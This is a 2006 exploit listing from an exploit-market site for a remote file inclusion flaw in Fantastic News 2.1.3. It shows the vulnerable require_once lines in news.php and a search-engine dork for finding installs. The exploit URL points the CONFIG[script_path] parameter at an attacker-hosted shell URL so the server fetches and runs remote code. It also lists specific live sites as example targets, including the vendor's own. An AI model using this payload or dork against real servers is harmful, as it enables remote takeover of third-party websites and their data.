[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Fantastic News <= 2.1.3 (script_path) Remote File Include Vulnerability

Author
SHiKaA
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-720
Category
web applications
Date add
18-08-2006
Platform
unsorted
=======================================================================
Fantastic News <= 2.1.3 (script_path) Remote File Include Vulnerability
=======================================================================



#==============================================================================================
#Fantastic News <= v2.1.3 (CONFIG[script_path]) Remote File Inclusion Exploit
#===============================================================================================
#                                                                            
#Critical Level : Dangerous                                                  
#                                                                            
#Venedor site : http://fscripts.com/              
#                                                                              
#Version : v2.1.2 & v2.1.3                                                  
#                                                                
#================================================================================================
#
#Dork : "Powered by Fantastic News v2.1.2" or "Powered by Fantastic News v2.1.3"
#
#================================================================================================
#
#Bug in : news.php
#
#Vlu Code :
#--------------------------------
#  require_once($CONFIG['script_path']."config.php");
#  require_once($CONFIG['script_path']."functions/functions.php");
#  require_once($CONFIG['script_path']."functions/mysql.php");
#  require_once($CONFIG['script_path']."functions/template.php");
#
#================================================================================================
#
#Exploit :
#--------------------------------
#
#http://sitename.com/[Script Path]/news.php?CONFIG[script_path]=http://SHELLURL.COM?
#
#Example :
#   http://fscripts.com/ ====> vendor site =)) hahahahaaaaaa ====>    2.1.3
#   http://lnx.evanescencewebsite.com/PressArchive  =====>    2.1.2
#
#
#
#================================================================================================
#Discoverd By : SHiKaA
==================================================================================================





#  0day.today [2024-11-16]  #